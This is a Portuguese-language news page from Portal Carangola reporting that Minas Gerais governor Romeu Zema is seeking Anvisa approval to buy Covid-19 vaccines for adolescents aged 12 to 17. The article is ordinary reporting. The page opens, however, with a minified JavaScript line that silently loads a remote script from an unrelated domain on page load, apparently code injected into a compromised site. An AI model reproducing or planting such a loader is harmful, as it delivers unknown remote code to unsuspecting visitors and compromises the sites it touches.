;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Covid: Minas já tenta adquirir vacinas para público entre 12 e 17 anos, diz Zema. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Covid: Minas já tenta adquirir vacinas para público entre 12 e 17 anos, diz Zema.

Betim começou a vacinar os estudantes, mas teve que interromper a imunização por ordem judicial.

Minas Gerais pediu autorização à Anvisa para comprar vacina para imunizar os jovens com idade entre 12 a 17 anos. Além disso, o Estado também reiterou junto ao Ministério da Saúde para incluir este público na campanha de imunização contra a Covid-19.

A informação foi dada nesta quinta-feira (15) pelo governador Romeu Zema (Novo) ao jornal Tribunal. Até o momento, a Anvisa aprovou que os adolescentes sejam vacinados com o imunizante da Pfizer, mas o grupo desta faixa etária não foi contemplado pelo governo federal.

“Nós já pleiteamos para o Ministério da Saúde que este público seja incluído tão logo o público acima de 18 anos tenha o processo de imunização feita”, declarou o governador. Ele também disse que está negociando a compra das vacinas para aplicar nos estudantes mineiros.

‘Vacinar meninos de 13 e 14 anos deveria ser uma prioridade’, diz Medioli

“E mesmo que o Ministério da Saúde não concorde (com a solicitação), o Estado de Minas já solicitou autorização à Anvisa para adquirir vacinas e estar imunizando esse público. Então, tudo indica que nós vamos sim levar essa imunização para pessoas acima de 12 anos”, disse Zema.

Oficialmente, a Secretaria Estadual de Saúde (SES) ainda não se manifestou sobre a solicitação e a negociação.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.